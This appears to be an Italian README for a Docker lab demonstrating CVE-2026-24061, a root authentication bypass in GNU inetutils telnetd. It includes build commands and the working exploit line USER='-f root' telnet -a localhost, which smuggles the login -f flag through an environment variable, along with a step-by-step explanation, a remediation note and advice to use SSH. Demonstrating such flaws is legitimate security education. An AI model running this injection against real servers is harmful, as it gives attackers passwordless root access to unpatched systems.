
Questo è un semplice PoC che ti permette di evidenziare la gravità del bug Telnet attualmente in corso e attivamente sfruttato. Perché le persone usano ancora Telnet... non lo capisco.
Un laboratorio Docker per dimostrare la CVE-2026-24061 — una vulnerabilità critica di bypass dell'autenticazione in GNU inetutils telnetd rimasta senza patch per 11 anni.
Telnetd passa la variabile d'ambiente USER direttamente a /usr/bin/login senza alcuna sanificazione. Il binario login dispone di un flag -f che salta l'autenticazione (pensato per sessioni già autenticate). Impostando USER='-f root', un attaccante inganna login facendogli concedere accesso root senza password.
Versioni interessate: GNU inetutils 1.9.3 (marzo 2015) fino alla 2.7 Punteggio CVSS: 9.8 (Critico) Correzione: Aggiornare a inetutils 2.8+
# Crea l'immagine
docker build -t telnetd-exploit .
# Avvia il container (ti porta in una shell come user1)
docker run --rm -it telnetd-exploit
# Exploit — ottieni root senza password
USER='-f root' telnet -a localhost
Ti ritroverai in una shell root. Esegui whoami per confermare.
1. Il client si connette con: USER='-f root' telnet -a localhost
2. telnetd riceve la variabile d'ambiente USER: "-f root"
3. telnetd esegue: /usr/bin/login -f root
4. login interpreta -f come "salta l'autenticazione, l'utente è già verificato"
5. L'attaccante ottiene una shell root — nessuna password richiesta
Il flag -f è legittimo — serve per scenari in cui un utente è già autenticato (ad esempio, da una sessione locale attendibile). Il bug è che telnetd non sanifica la variabile USER prima di passarla a login, consentendo ad attaccanti remoti di iniettare il flag.
A gennaio 2026:
Anche senza questo bug, Telnet trasmette tutto in chiaro — incluse le password. Usa SSH.
| Protocollo | Crittografia | Autenticazione |
|---|---|---|
| Telnet | Nessuna | In chiaro |
| SSH | Sì | Chiave/Password |
.
├── Dockerfile # Crea il container Debian vulnerabile
├── docker-entrypoint.sh # Avvia inetd, passa a user1
└── README.md
Laboratorio basato su leonjza/inetutils-telnetd-auth-bypass